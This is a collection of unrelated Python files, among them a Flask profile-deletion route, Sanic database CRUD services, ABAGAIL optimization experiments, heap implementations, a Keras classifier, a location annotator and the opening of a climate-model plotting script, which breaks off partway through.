    doomed = User.query.get(id)
    db.session.delete(doomed)
    db.session.commit()
    return f"Successfully deleted profile #{id}"
if __name__ == "__main__":
    # Development server only; debug mode must not be used in production.
    app.debug = True
    app.run()
|
from .webdriver import WebDriverMixin
|
# coding: utf-8
# In[419]:
import numpy as np
import sys
if "../" not in sys.path:
sys.path.append("../")
from lib.envs.halften import HalftenEnv
# This script is mainly used to exercise/test the environment.
# In[420]:
env = HalftenEnv()
# Outcome labels (bust / plain hand / ten-and-a-half / five-small /
# heavenly king / heavenly five-small).
content = ["爆牌","平牌","十点半","五小","天王","天五小"]
# In[422]:
def print_observation(observation):
    """Pretty-print one observation: (score, hand size, face-card count)."""
    score, card_num, p_num = observation
    msg = "玩家分数: {} (手牌数: {},人牌数: {})".format(score, card_num, p_num)
    print(msg)
# Simple fixed strategy: stop asking for cards once the score reaches 10.
def strategy(observation):
    """Hit (1) while the score is below 10, otherwise stand (0)."""
    score = observation[0]
    if score >= 10:
        return 0
    return 1
# Play 20 episodes with the fixed strategy, printing each step.
for i_episode in range(20):
    observation = env._reset()
    for t in range(100):
        print_observation(observation)
        action = strategy(observation)
        # "采取的行为" = action taken; 停牌 = stand, 叫牌 = hit.
        print("采取的行为: {}".format( ["停牌", "叫牌"][action]))
        # NOTE(review): uses the env's private _reset/_step API — confirm
        # HalftenEnv intends these to be called directly.
        observation, reward, done, _ = env._step(action)
        if done:
            print_observation(observation)
            # "游戏结束,回报" = game over, reward.
            print("游戏结束,回报: {}\n".format(float(reward)))
            print("*"*50)
            break
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
import ujson
from decimal import Decimal
from sanic.log import logger
from sanic.request import Request
# IMPORT HW ACTION SPECIFICATIONS
from .specification.get_hw_action_specification import (
get_hw_action_list_query, get_hw_action_list_count_query,
get_hw_action_element_query, get_hw_action_list_user_type_query
)
from .specification.delete_hw_action_specification import delete_hw_action_element_query
from .specification.update_hw_action_specification import update_hw_action_element_query
from .specification.create_hw_action_specification import create_hw_action_element_query
__all__ = [
# SERVICES WORKING ON HW ACTION TABLE
'get_hw_action_list', 'get_hw_action_list_count', 'get_hw_action_element',
'get_hw_action_list_user_type', 'create_hw_action_element', 'update_hw_action_element',
'delete_hw_action_element'
]
# HW ACTION SERVICES
async def get_hw_action_list(
        request: Request,
        name: object = None,
        action_type: object = None,
        limit: int = 0,
        offset: int = 0) -> list:
    """ Get hw_action list ordered by hw_action id desc.
    :param request: Sanic request; provides the postgres pool at request.app.pg
    :param name: optional name filter forwarded to the query as $1
    :param action_type: optional action-type filter forwarded as $2
    :param limit: page size; when 0 the whole list is returned unpaged
    :param offset: page offset, only used when limit > 0
    :return: list of matching rows as dicts (empty list on error or no rows)
    """
    ret_val = []
    query_str = get_hw_action_list_query
    try:
        if limit > 0:
            # Paged variant: LIMIT/OFFSET bound as $3/$4.
            query_str += ' ORDER BY hwa.id DESC LIMIT $3 OFFSET $4;'
            async with request.app.pg.acquire() as connection:
                rows = await connection.fetch(query_str, name, action_type, limit, offset)
        else:
            query_str += ' ORDER BY hwa.id DESC;'
            async with request.app.pg.acquire() as connection:
                rows = await connection.fetch(query_str, name, action_type)
        if rows is not None:
            ret_val = [dict(x) for x in rows]
    except Exception as gclerr:
        # Errors are swallowed by design: callers always get a list.
        logger.error('get_hw_action_list service erred with: {}'.format(gclerr))
    return ret_val
async def get_hw_action_list_count(
        request: Request,
        name: object = None,
        action_type: object = None) -> int:
    """ Get hw_action list count.
    :param request: Sanic request; provides the postgres pool
    :param name: optional name filter forwarded to the query
    :param action_type: optional action-type filter forwarded to the query
    :return: number of matching rows (0 on error)
    """
    count = 0
    try:
        async with request.app.pg.acquire() as connection:
            value = await connection.fetchval(
                get_hw_action_list_count_query, name, action_type)
        if value is not None:
            count = value
    except Exception as gclcerr:
        logger.error('get_hw_action_list_count service erred with: {}'.format(gclcerr))
    return count
async def get_hw_action_element(
        request: Request,
        hw_action_id: int = 0) -> dict:
    """ Get hw_action element by hw_action id.
    :param request: Sanic request; provides the postgres pool
    :param hw_action_id: id of the row to fetch
    :return: the row as a dict ({} on error or unknown id)
    """
    ret_val = {}
    query_str = get_hw_action_element_query
    try:
        async with request.app.pg.acquire() as connection:
            # Decode json columns straight into Python objects via ujson.
            await connection.set_type_codec(
                'json',
                encoder=ujson.dumps,
                decoder=ujson.loads,
                schema='pg_catalog'
            )
            row = await connection.fetchrow(query_str, hw_action_id)
            if row is not None:
                ret_val = dict(row)
    except Exception as gclcerr:
        logger.error('get_hw_action_element service erred with: {}'.format(gclcerr))
    return ret_val
async def get_hw_action_list_user_type(
        request: Request) -> list:
    """ Get all hw actions with user_type
    :param request: Sanic request; provides the postgres pool
    :return: list of rows as dicts (empty list on error or no rows)
    """
    # Fix: initialise to a list to match the declared return type — the old
    # code returned {} when no rows were found.  Leftover debug prints removed.
    ret_val = []
    query_str = get_hw_action_list_user_type_query
    try:
        async with request.app.pg.acquire() as connection:
            # Decode json columns straight into Python objects via ujson.
            await connection.set_type_codec(
                'json',
                encoder=ujson.dumps,
                decoder=ujson.loads,
                schema='pg_catalog'
            )
            rows = await connection.fetch(query_str)
            if rows is not None:
                ret_val = [dict(x) for x in rows]
    except Exception as gclcerr:
        logger.error('get_hw_action_list_user_type service erred with: {}'.format(gclcerr))
    return ret_val
async def create_hw_action_element(
        request: Request,
        name: str = '',
        proto_field: str = '',
        meta_information: dict = None,
        min_value: Decimal = Decimal('0.0'),
        max_value: Decimal = Decimal('100.0'),
        active: bool = True) -> dict:
    """ Create hw_action element
    :param request: Sanic request; provides the postgres pool
    :param name: display name of the action
    :param proto_field: protobuf field the action maps to
    :param meta_information: optional JSON-serialisable metadata (defaults to {})
    :param min_value: lower bound for the action value
    :param max_value: upper bound for the action value
    :param active: whether the action is enabled
    :return: the created row as a dict ({} on error)
    """
    # Fix: a mutable default argument ({}) is shared between calls; use None
    # as the sentinel and create a fresh dict per call.
    if meta_information is None:
        meta_information = {}
    ret_val = {}
    query_str = create_hw_action_element_query
    try:
        async with request.app.pg.acquire() as connection:
            row = await connection.fetchrow(
                query_str, name, proto_field, ujson.dumps(meta_information),
                min_value, max_value, active)
            if row is not None:
                ret_val = dict(row)
    except Exception as gclcerr:
        logger.error('create_hw_action_element service erred with: {}'.format(gclcerr))
    return ret_val
async def update_hw_action_element(
        request: Request,
        hw_action_id: int = 0,
        name: str = '',
        proto_field: str = '',
        meta_information: dict = None,
        min_value: Decimal = Decimal('0.0'),
        max_value: Decimal = Decimal('100.0'),
        active: bool = True) -> dict:
    """ Update hw_action element by hw_action id.
    :param request: Sanic request; provides the postgres pool
    :param hw_action_id: id of the row to update
    :param name: new display name
    :param proto_field: new protobuf field mapping
    :param meta_information: optional JSON-serialisable metadata (defaults to {})
    :param min_value: new lower bound
    :param max_value: new upper bound
    :param active: whether the action is enabled
    :return: the updated row as a dict ({} on error or unknown id)
    """
    # Fix: a mutable default argument ({}) is shared between calls; use None
    # as the sentinel.  The docstring/log text previously said "update read
    # status", a copy-paste from another service.
    if meta_information is None:
        meta_information = {}
    ret_val = {}
    query_str = update_hw_action_element_query
    try:
        async with request.app.pg.acquire() as connection:
            row = await connection.fetchrow(
                query_str, hw_action_id, name,
                proto_field,
                ujson.dumps(meta_information),
                min_value, max_value, active)
            if row is not None:
                ret_val = dict(row)
    except Exception as gclcerr:
        logger.error('update_hw_action_element service erred with: {}'.format(gclcerr))
    return ret_val
async def delete_hw_action_element(
        request: Request,
        hw_action_id: int = 0) -> dict:
    """ Delete hw_action element by hw_action id.
    :param request: Sanic request; provides the postgres pool
    :param hw_action_id: id of the row to delete
    :return: the deleted row as a dict ({} on error or unknown id)
    """
    deleted = {}
    try:
        async with request.app.pg.acquire() as connection:
            row = await connection.fetchrow(
                delete_hw_action_element_query, hw_action_id)
        if row is not None:
            deleted = dict(row)
    except Exception as gclcerr:
        logger.error('delete_hw_action_element service erred with: {}'.format(gclcerr))
    return deleted
|
import time
import sys
sys.path.append("./ABAGAIL-master/ABAGAIL.jar")
import dist.DiscreteDependencyTree as DiscreteDependencyTree
import dist.DiscreteUniformDistribution as DiscreteUniformDistribution
import opt.DiscreteChangeOneNeighbor as DiscreteChangeOneNeighbor
import opt.GenericHillClimbingProblem as GenericHillClimbingProblem
import opt.RandomizedHillClimbing as RandomizedHillClimbing
import opt.SimulatedAnnealing as SimulatedAnnealing
import opt.ga.SingleCrossOver as SingleCrossOver
import opt.ga.DiscreteChangeOneMutation as DiscreteChangeOneMutation
import opt.ga.GenericGeneticAlgorithmProblem as GenericGeneticAlgorithmProblem
import opt.ga.StandardGeneticAlgorithm as StandardGeneticAlgorithm
import opt.prob.GenericProbabilisticOptimizationProblem as GenericProbabilisticOptimizationProblem
import opt.prob.MIMIC as MIMIC
import shared.FixedIterationTrainer as FixedIterationTrainer
import opt.example.ContinuousPeaksEvaluationFunction as ContinuousPeaksEvaluationFunction
from array import array
from time import clock
from itertools import product
from base import *
# Adapted from https://github.com/JonathanTay/CS-7641-assignment-2/blob/master/continuouspeaks.py
"""
Commandline parameter(s):
none
"""
# Problem setup for Continuous Peaks (Jython/ABAGAIL, Python 2 syntax).
N = 100           # bit-string length
T = 29            # run-length threshold for the bonus
maxIters = 5551
numTrials = 1
fill = [2] * N    # each position takes values {0, 1}
ranges = array('i', fill)
#outfile = './CONTPEAKS/CONTPEAKS_{}_{}_LOG.csv'
outfile = './CONTPEAKS/CONTPEAKS_@ALG@_@N@_LOG.txt'
ef = ContinuousPeaksEvaluationFunction(T)
odd = DiscreteUniformDistribution(ranges)
nf = DiscreteChangeOneNeighbor(ranges)
mf = DiscreteChangeOneMutation(ranges)
cf = SingleCrossOver()
df = DiscreteDependencyTree(.1, ranges)
hcp = GenericHillClimbingProblem(ef, odd, nf)
gap = GenericGeneticAlgorithmProblem(ef, odd, mf, cf)
pop = GenericProbabilisticOptimizationProblem(ef, odd, df)
# RHC
# Randomized Hill Climbing: train in 10-iteration chunks, logging
# fitness and cumulative wall time after each chunk.
for t in range(numTrials):
    fname = outfile.replace('@ALG@','RHC').replace('@N@',str(t+1))
    with open(fname, 'w') as f:
        f.write('iterations,fitness,time\n')
    # Fresh problem instances per trial.
    ef = ContinuousPeaksEvaluationFunction(T)
    odd = DiscreteUniformDistribution(ranges)
    nf = DiscreteChangeOneNeighbor(ranges)
    hcp = GenericHillClimbingProblem(ef, odd, nf)
    rhc = RandomizedHillClimbing(hcp)
    fit = FixedIterationTrainer(rhc, 10)
    times = [0]
    for i in range(0, maxIters, 10):
        start = clock()
        fit.train()
        elapsed = time.clock() - start
        times.append(times[-1] + elapsed)
        #fevals = ef.fevals
        score = ef.value(rhc.getOptimal())
        #ef.fevals -= 1
        st = '{},{},{}\n'.format(i, score, times[-1])
        print st
        with open(fname, 'a') as f:
            f.write(st)
# SA
# Simulated Annealing: sweep the cooling exponent CE with a fixed
# starting temperature of 1E10.
for t in range(numTrials):
    for CE in [0.15, 0.35, 0.55, 0.75, 0.95]:
        #fname = outfile.format('SA{}'.format(CE), str(t + 1))
        fname = outfile.replace('@ALG@','SA{}'.format(CE)).replace('@N@',str(t+1))
        with open(fname, 'w') as f:
            f.write('iterations,fitness,time\n')
        ef = ContinuousPeaksEvaluationFunction(T)
        odd = DiscreteUniformDistribution(ranges)
        nf = DiscreteChangeOneNeighbor(ranges)
        hcp = GenericHillClimbingProblem(ef, odd, nf)
        sa = SimulatedAnnealing(1E10, CE, hcp)
        fit = FixedIterationTrainer(sa, 10)
        times = [0]
        for i in range(0, maxIters, 10):
            start = clock()
            fit.train()
            elapsed = time.clock() - start
            times.append(times[-1] + elapsed)
            #fevals = ef.fevals
            score = ef.value(sa.getOptimal())
            #ef.fevals -= 1
            st = '{},{},{}\n'.format(i, score, times[-1])
            print st
            with open(fname, 'a') as f:
                f.write(st)
# GA
# Genetic Algorithm: grid over mating and mutation counts at population 100.
for t in range(numTrials):
    for pop, mate, mutate in product([100], [50, 30, 10], [50, 30, 10]):
        #fname = outfile.format('GA{}_{}_{}'.format(pop, mate, mutate), str(t + 1))
        fname = outfile.replace('@ALG@','GA{}_{}_{}'.format(pop,mate,mutate)).replace('@N@',str(t+1))
        with open(fname, 'w') as f:
            f.write('iterations,fitness,time\n')
        ef = ContinuousPeaksEvaluationFunction(T)
        odd = DiscreteUniformDistribution(ranges)
        nf = DiscreteChangeOneNeighbor(ranges)
        mf = DiscreteChangeOneMutation(ranges)
        cf = SingleCrossOver()
        gap = GenericGeneticAlgorithmProblem(ef, odd, mf, cf)
        ga = StandardGeneticAlgorithm(pop, mate, mutate, gap)
        fit = FixedIterationTrainer(ga, 10)
        times = [0]
        for i in range(0, maxIters, 10):
            start = clock()
            fit.train()
            elapsed = time.clock() - start
            times.append(times[-1] + elapsed)
            #fevals = ef.fevals
            score = ef.value(ga.getOptimal())
            #ef.fevals -= 1
            st = '{},{},{}\n'.format(i, score, times[-1])
            print st
            with open(fname, 'a') as f:
                f.write(st)
# MIMIC
# MIMIC: sweep the dependency-tree smoothing parameter m.
# NOTE: `pop` was an integer above; here it is rebound to the
# probabilistic-optimization problem object (confusing but harmless,
# since the GA loop has already finished).
for t in range(numTrials):
    for samples, keep, m in product([100], [50], [0.1, 0.3, 0.5, 0.7, 0.9]):
        #fname = outfile.format('MIMIC{}_{}_{}'.format(samples, keep, m), str(t + 1))
        fname = outfile.replace('@ALG@','MIMIC{}_{}_{}'.format(samples,keep,m)).replace('@N@',str(t+1))
        with open(fname, 'w') as f:
            f.write('iterations,fitness,time\n')
        ef = ContinuousPeaksEvaluationFunction(T)
        odd = DiscreteUniformDistribution(ranges)
        nf = DiscreteChangeOneNeighbor(ranges)
        mf = DiscreteChangeOneMutation(ranges)
        cf = SingleCrossOver()
        gap = GenericGeneticAlgorithmProblem(ef, odd, mf, cf)
        df = DiscreteDependencyTree(m, ranges)
        pop = GenericProbabilisticOptimizationProblem(ef, odd, df)
        mimic = MIMIC(samples, keep, pop)
        fit = FixedIterationTrainer(mimic, 10)
        times = [0]
        for i in range(0, maxIters, 10):
            start = clock()
            fit.train()
            elapsed = time.clock() - start
            times.append(times[-1] + elapsed)
            #fevals = ef.fevals
            score = ef.value(mimic.getOptimal())
            #ef.fevals -= 1
            st = '{},{},{}\n'.format(i, score, times[-1])
            print st
            with open(fname, 'a') as f:
                f.write(st)
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Exception-handling demo (Python 2).  Dividing a string by an int
# deliberately triggers the TypeError branch.
dividendo = "A"
divisor = 2
try:
    resultado = dividendo/divisor
except ZeroDivisionError:
    print "No puedes dividir por cero, animal"
except TypeError:
    print "Hay que ser bruto: eso no es un número"
else:
    # Only reached when no exception was raised.
    print "La división resulta: ", resultado
|
# -*-coding:utf-8-*-
"""
Heap sort (NumPy-based demo).
"""
import numpy as np
def create_array(num):
    """Return `num` random integers drawn uniformly from [0, 20)."""
    return np.random.randint(0, 20, size=num)
def max_heapify(arr, i):
    """
    Restore the max-heap property at index `i`, sifting down recursively.
    Treats the whole of `arr` (len(arr)) as the heap.
    """
    n = len(arr)
    left, right = 2 * i + 1, 2 * i + 2
    largest = i
    if left < n and arr[left] > arr[largest]:
        largest = left
    if right < n and arr[right] > arr[largest]:
        largest = right
    if largest != i:
        arr[i], arr[largest] = arr[largest], arr[i]
        max_heapify(arr, largest)
def build_max_heap(arr):
    """
    Heapify `arr` in place into a max-heap, sifting down from the last
    parent node up to the root.
    """
    last_parent = (len(arr) - 2) // 2
    for idx in range(last_parent, -1, -1):
        max_heapify(arr, idx)
def heap_sort(arr):
    """
    Heap sort: return the values of `arr` as a list in descending order.

    Fix: the previous version rebuilt the array with np.delete on every
    extraction — O(n) per step (O(n^2) total) and it required a numpy
    array — and it partially clobbered the caller's array.  This version
    works on a plain list copy in O(n log n) and leaves the input intact.
    """
    heap = list(arr)
    build_max_heap(heap)
    result = []
    while heap:
        # Root is the current maximum; replace it with the last leaf.
        result.append(heap[0])
        heap[0] = heap[-1]
        heap.pop()
        if heap:
            max_heapify(heap, 0)
    return result
if __name__ == '__main__':
    # Demo: show the array before and after heapification, then sorted.
    arr1 = create_array(10)
    print(arr1)
    build_max_heap(arr1)
    print(arr1)
    # heap_sort returns the values in descending order.
    arr2 = heap_sort(arr1)
    print(arr2)
|
import hashlib
def get_md5(src):
    """Return the hex MD5 digest of `src`.

    Accepts either str (UTF-8 encoded first) or bytes.
    Fix: type check now uses isinstance instead of `type(src) == str`,
    and the digest is computed in a single call.
    """
    if isinstance(src, str):
        src = src.encode()
    return hashlib.md5(src).hexdigest()
|
import copy
a=[10,20,[5,6]]
# Shallow copy: the outer list is duplicated, but the nested [5,6]
# is shared between a and b.
b=copy.copy(a)
b.append(30)   # affects b only
b[1]=10        # affects b only (top-level element)
print(b)
print(a)
import sklearn.preprocessing
import tensorflow.keras as keras
import tensorflow as tf
import pandas
tf.random.set_seed(1)
# Load the breast-cancer data set; `diagnosis` is the label column.
dataframe = pandas.read_csv("data/breast-cancer/data.csv", index_col="id")
y = dataframe.diagnosis
x = dataframe.drop("diagnosis", axis=1)  # explicit keyword: positional axis is deprecated
# Scale features with median/IQR to tame outliers.
scaler = sklearn.preprocessing.RobustScaler()
scaler.fit(x)
X = scaler.transform(x)
y = keras.utils.to_categorical(y)
model = keras.Sequential([
    keras.layers.Dense(30, activation=tf.nn.relu,
                       input_shape=(x.shape[1],)),
    keras.layers.Dense(30, activation=tf.nn.relu),
    keras.layers.Dense(30, activation=tf.nn.relu),
    keras.layers.Dense(2, activation=tf.nn.softmax)
])
model.compile(loss="categorical_crossentropy", metrics=['accuracy'])
# for 2 categories bce ~= cce
model.summary()
# Fix: train and evaluate on the scaled features X — the scaler was
# previously fitted but the raw `x` was passed to fit/evaluate, so the
# scaling had no effect at all.
history = model.fit(X, y, epochs=100, batch_size=10, validation_split=0.2)
evaluation = model.evaluate(X, y)  # renamed from `eval`, which shadows the builtin
print(evaluation)
print(f"Total accuracy: {history.history['val_accuracy'][-1]*100:.2f}%")
|
class MaxHeap(object):
    """Array-backed binary max-heap with a fixed capacity."""

    def __init__(self, maxSize=None):
        self.maxSize = maxSize            # maximum number of elements
        self._elements = [None] * maxSize # backing array
        self._count = 0                   # number of live elements

    def __len__(self):
        return self._count

    def add(self, value):
        """Insert `value`; raises Exception("full") at capacity."""
        if self._count >= self.maxSize:
            raise Exception("full")
        self._elements[self._count] = value
        self._count += 1
        self._siftup(self._count - 1)

    def _siftup(self, ndx):
        # Bubble the element at ndx up while it beats its parent.
        if ndx > 0:
            parent = (ndx - 1) // 2
            if self._elements[ndx] > self._elements[parent]:
                self._elements[ndx], self._elements[parent] = self._elements[parent], self._elements[ndx]
                self._siftup(parent)

    def extract(self):
        """Remove and return the maximum; raises Exception("empty") when empty."""
        if self._count <= 0:
            raise Exception("empty")
        value = self._elements[0]
        self._count -= 1
        self._elements[0] = self._elements[self._count]
        self._siftdown(0)
        return value

    def _siftdown(self, ndx):
        # Bubble the element at ndx down below any larger child.
        # Bug fix: the old code tested `left == self._count` for the
        # "only a left child" case, which is one PAST the last valid
        # index (valid indices are 0.._count-1).  A node whose single
        # left child was the final live element was therefore never
        # compared, silently breaking the heap invariant (and the old
        # branch even read a stale slot from the backing array).
        left = 2 * ndx + 1
        right = 2 * ndx + 2
        largest = ndx
        if left < self._count and self._elements[left] > self._elements[largest]:
            largest = left
        if right < self._count and self._elements[right] > self._elements[largest]:
            largest = right
        if largest != ndx:
            self._elements[ndx], self._elements[largest] = self._elements[largest], self._elements[ndx]
            self._siftdown(largest)
def test_maxheap():
    """Build a heap from random values and verify they extract in
    non-increasing order.

    Fix: the old version pre-allocated a 100,000,000-slot heap (~800 MB)
    to hold 10,000 items, and merely printed the extractions instead of
    checking the result.
    """
    import random
    values = [random.randint(0, 10000) for _ in range(10000)]
    h = MaxHeap(len(values))
    for v in values:
        h.add(v)
    extracted = [h.extract() for _ in range(len(values))]
    assert extracted == sorted(values, reverse=True)
if __name__ == '__main__':
    test_maxheap()
|
"""
Base class
"""
class BaseTestCase:
    """Shared constants and helpers for YouTube API test cases."""
    BASE_PATH = "testdata/apidata"
    BASE_URL = "https://www.googleapis.com/youtube/v3"
    # NOTE(review): the real YouTube Data API resource paths are lower-case
    # ("channels"); confirm whether RESOURCE is intentionally upper-case.
    RESOURCE = "CHANNELS"

    @property
    def url(self):
        """Full URL of the resource under test."""
        return f"{self.BASE_URL}/{self.RESOURCE}"

    def load_json(self, filename, helpers):
        """Load the JSON fixture `filename` from BASE_PATH via `helpers`.

        Fix: the `filename` argument was ignored — the path was built with
        a hard-coded "(unknown)" placeholder, so every call loaded the
        same nonexistent file.
        """
        return helpers.load_json(f"{self.BASE_PATH}/{filename}")
|
"""
Heber Cooke 10/15/2019
Chapter 4 Exercise 4
Convert a decimal number to an octal number
"""
#decimal to octal
decimal = int(input("Enter a Decimal number: "))
if decimal == 0:
    # Zero has no remainders to collect; print it directly.
    print(0)
else:
    bString = ""
    # Repeated division by 8: each remainder is the next octal digit,
    # prepended so digits come out most-significant first.
    while decimal > 0:
        remainder = decimal % 8
        decimal = decimal // 8
        bString = str(remainder) + bString
    print("The Octal number is: ", bString)
import numpy as np
class ActivationRelu(object):
    """ReLU activation: elementwise max(0, x)."""

    def __init__(self, *args, **kwargs):
        self.nama = kwargs.get('nama', None)

    def compute_activation(self, total_net, derivative=False):
        """Forward: max(0, x).  Derivative: thresholds `total_net`
        IN PLACE to 0/1 and returns it."""
        if derivative:
            total_net[total_net <= 0] = 0
            total_net[total_net > 0] = 1
            return total_net
        return np.maximum(0, total_net)
class ActivationSoftmax(object):
    """Numerically-stable softmax along axis 0."""

    def __init__(self, *args, **kwargs):
        self.nama = kwargs.get('nama', None)

    def compute_activation(self, total_net, derivative=False):
        """Forward: softmax(x) with max-subtraction for stability.
        Derivative: returns the input unchanged (placeholder)."""
        if derivative:
            return total_net
        shifted = total_net - np.max(total_net)
        exps = np.exp(shifted)
        return exps / exps.sum(axis=0)
class Layer(object):
    """A fully-connected layer: output = activation(input . weights + biases)."""

    def __init__(self, neuron, **kwargs):
        self.neuron_num = neuron
        # Activation name ('relu'/'softmax') before compile(), an
        # activation object afterwards.
        self.activation = kwargs.get('activation', None)
        self.weights = kwargs.get('weights', None)
        self.biases = kwargs.get('biases', None)

    def compute_total_net(self, input_net):
        """Affine part: input_net . weights + biases."""
        return np.add(np.dot(input_net, self.weights), self.biases)

    def compute_activation(self, total_net):
        """Apply this layer's activation to the net input.

        Fix: the original body was left unfinished (a dangling `elif`
        with no expression — a syntax error that broke the whole module).
        Once compile() has resolved the activation into an object, we can
        simply delegate to it.
        """
        return self.activation.compute_activation(total_net)
class NeuralNetworkAlgoritm(object):
    """Minimal sequential feed-forward network container."""

    def __init__(self, *args, **kwargs):
        self.layers = []  # ordered list of Layer objects

    def compile(self, **kwargs):
        """Initialise missing weights/biases and resolve activation names.

        Fix: the comparisons used `== None`, which raises an "ambiguous
        truth value" error as soon as weights/biases are numpy arrays;
        identity checks with `is None` are correct (and idiomatic).
        """
        current_input = kwargs['input_num']
        for layer in self.layers:
            if layer.weights is None:
                layer.weights = np.random.randn(current_input, layer.neuron_num)
            if layer.biases is None:
                layer.biases = np.random.randn(layer.neuron_num)
            if layer.activation == 'relu':
                layer.activation = ActivationRelu(nama='relu')
            elif layer.activation == 'softmax':
                layer.activation = ActivationSoftmax(nama='softmax')
            current_input = layer.neuron_num

    def add(self, layer):
        """Append a layer to the network."""
        self.layers.append(layer)

    def train(self, input_net, output_net, epoch):
        """Forward pass through all layers (no backpropagation yet;
        `output_net` and `epoch` are currently unused)."""
        current_input = input_net
        for layer in self.layers:
            layer.total_net = layer.compute_total_net(current_input)
            layer.output = layer.compute_activation(layer.total_net)
            current_input = layer.output
import json
import re
from tqdm import tqdm
userdata = []
# State-name synonyms -> state code.
with open("../data/state_synsets.txt", encoding = 'utf-8', mode = 'r') as f:
    state_mapping = json.load(f)
city_mapping = {}
# Fix: raw strings so the backslash escapes are regex syntax, not Python
# string escapes — "(\(\w{2}\))" without the r-prefix emits an invalid
# escape-sequence DeprecationWarning (the matched pattern is unchanged).
find_state = re.compile(r"(\(\w{2}\))")
find_city = re.compile(r"(.+ )")
# Each raw line looks like "<city name> (XY)"; build city -> state code.
with open("../data/german_cities_raw.txt", encoding = 'utf-8', mode='r') as f:
    for entry in f:
        city = find_city.findall(entry)[0].strip()
        state = find_state.findall(entry)[0].replace("(","").replace(")","")
        city_mapping[city] = state
        # city_mapping[city] = ""
def is_german_city(x):
    # NOTE(review): despite the name this is a debugging aid, not a
    # predicate — it returns None and merely PRINTS locations that match
    # no known city or state (case-insensitive substring test).
    if (not any(city.lower() in x.lower() for city in city_mapping.keys()) and
        not any(state.lower() in x.lower() for state in state_mapping.keys())):
        print(x)
def map_cities(location):
    """Return the distinct known German city names contained in `location`
    (case-sensitive substring match)."""
    found = {city for city in city_mapping if city in location}
    return list(found)
def map_states(location):
    """Return the distinct state codes implied by `location`, derived both
    from city names and from state-name synonyms (substring matches)."""
    codes = {city_mapping[city] for city in city_mapping if city in location}
    codes.update(state_mapping[state] for state in state_mapping if state in location)
    return list(codes)
# Load the hydrated user records, annotate each with derived state/city
# lists, and write the result back out.
with open("../data/users_fully_hydrated.json", encoding='utf-8', mode='r') as f:
    inf = f.read()
    userdata = json.loads(inf)
result = []
print("Annotating location..")
for user in tqdm(userdata):
    user['state'] = map_states(user['location'])
    user['city'] = map_cities(user['location'])
    result.append(user)
print("Done.")
with open("../data/users_with-loc.json", encoding = 'utf-8', mode='w') as f:
    # ensure_ascii=False keeps umlauts readable in the output file.
    json.dump(result,f ,indent = 2,ensure_ascii=False)
|
#!/usr/bin/env python
from os.path import join
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import netCDF4 as nc4
from e3sm_case_output import day_str
OUTPUT_DIR = "/p/lustre2/santos36/timestep_precip/"
# Which case set / region to plot; LAND_TROPICS implies TROPICS_ONLY.
FOCUS_PRECIP = True
USE_PRESAER = False
LAND_TROPICS = False
TROPICS_ONLY = False
if LAND_TROPICS:
    TROPICS_ONLY = True
assert not (FOCUS_PRECIP and USE_PRESAER), \
    "no precipitation-specific prescribed aerosol run set has been defined"
START_DAY = 3
END_DAY = 15
# Select the reference case, test cases, their short labels, and plot
# styles (color, linestyle) keyed by short label, per configuration.
if USE_PRESAER:
    REF_CASE_NAME = "timestep_presaer_ctrl"
    TEST_CASE_NAMES = [
        "timestep_presaer_ZM_10s",
        "timestep_presaer_CLUBB_MG2_10s",
        "timestep_presaer_CLUBB_MG2_10s_ZM_10s",
        "timestep_presaer_cld_10s",
        "timestep_presaer_all_10s",
        "timestep_presaer_ZM_10s_lower_tau",
        "timestep_presaer_CLUBB_MG2_10s_ZM_10s_lower_tau",
        "timestep_presaer_cld_10s_lower_tau",
        "timestep_presaer_all_10s_lower_tau",
    ]
    SHORT_TEST_CASE_NAMES = [
        "ZM10PA",
        "CLUBBMICRO10PA",
        "CLUBBMICRO10ZM10PA",
        "CLD10PA",
        "ALL10PA",
        "ZM10LTPA",
        "CLUBBMICRO10ZM10LTPA",
        "CLD10LTPA",
        "ALL10LTPA",
    ]
    STYLES = {
        "CLUBBMICRO10PA": ('indigo', '-'),
        "ALL10PA": ('dimgrey', '-'),
        "ZM10PA": ('g', '-'),
        "CLUBBMICRO10ZM10PA": ('saddlebrown', '-'),
        "CLD10PA": ('slateblue', '-'),
        "ALL10LTPA": ('dimgrey', '-.'),
        "ZM10LTPA": ('g', '-.'),
        "CLUBBMICRO10ZM10LTPA": ('saddlebrown', '-.'),
        "CLD10LTPA": ('slateblue', '-.'),
    }
elif FOCUS_PRECIP:
    REF_CASE_NAME = "timestep_ctrl"
    TEST_CASE_NAMES = [
        "timestep_MG2_10s",
    #    "timestep_CLUBB_10s_MG2_10s",
    #    "timestep_CLUBB_MG2_60s",
        "timestep_CLUBB_MG2_10s",
    #    "timestep_all_10s",
    #    "timestep_all_300s",
        "timestep_precip_grad",
        "timestep_precip_grad_MG2_10s",
        "timestep_precip_grad_CLUBB_MG2_10s",
    ]
    SHORT_TEST_CASE_NAMES = [
        "MICRO10",
    #    "CLUBB10MICRO10",
    #    "CLUBBMICRO60",
        "CLUBBMICRO10",
    #    "ALL10",
    #    "ALL300",
        "PFMG",
        "PFMGMICRO10",
        "PFMGCLUBBMICRO10",
    ]
    STYLES = {
        "MICRO10": ('r', '-'),
    #    "CLUBB10MICRO10": ('maroon', '-'),
    #    "CLUBBMICRO60": ('indigo', '--'),
        "CLUBBMICRO10": ('indigo', '-'),
    #    "ALL10": ('dimgrey', '-'),
    #    "ALL300": ('dimgrey', ':'),
        "PFMG": ('k', '-.'),
        "PFMGMICRO10": ('r', '-.'),
        "PFMGCLUBBMICRO10": ('indigo', '-.'),
    }
else:
    REF_CASE_NAME = "timestep_ctrl"
    TEST_CASE_NAMES = [
        "timestep_dyn_10s",
        "timestep_CLUBB_10s",
        "timestep_MG2_10s",
        "timestep_CLUBB_10s_MG2_10s",
        "timestep_CLUBB_MG2_Strang",
        "timestep_CLUBB_MG2_Strang_60s",
        "timestep_CLUBB_MG2_60s",
        "timestep_CLUBB_MG2_10s",
        "timestep_all_10s",
        "timestep_all_60s",
        "timestep_all_300s",
        "timestep_all_rad_10s",
    ]
    SHORT_TEST_CASE_NAMES = [
        "DYN10",
        "CLUBB10",
        "MICRO10",
        "CLUBB10MICRO10",
        "CLUBBMICROSTR",
        "CLUBBMICROSTR60",
        "CLUBBMICRO60",
        "CLUBBMICRO10",
        "ALL10",
        "ALL60",
        "ALL300",
        "ALLRAD10",
    ]
    STYLES = {
        "DYN10": ('y', '-'),
        "CLUBB10": ('b', '-'),
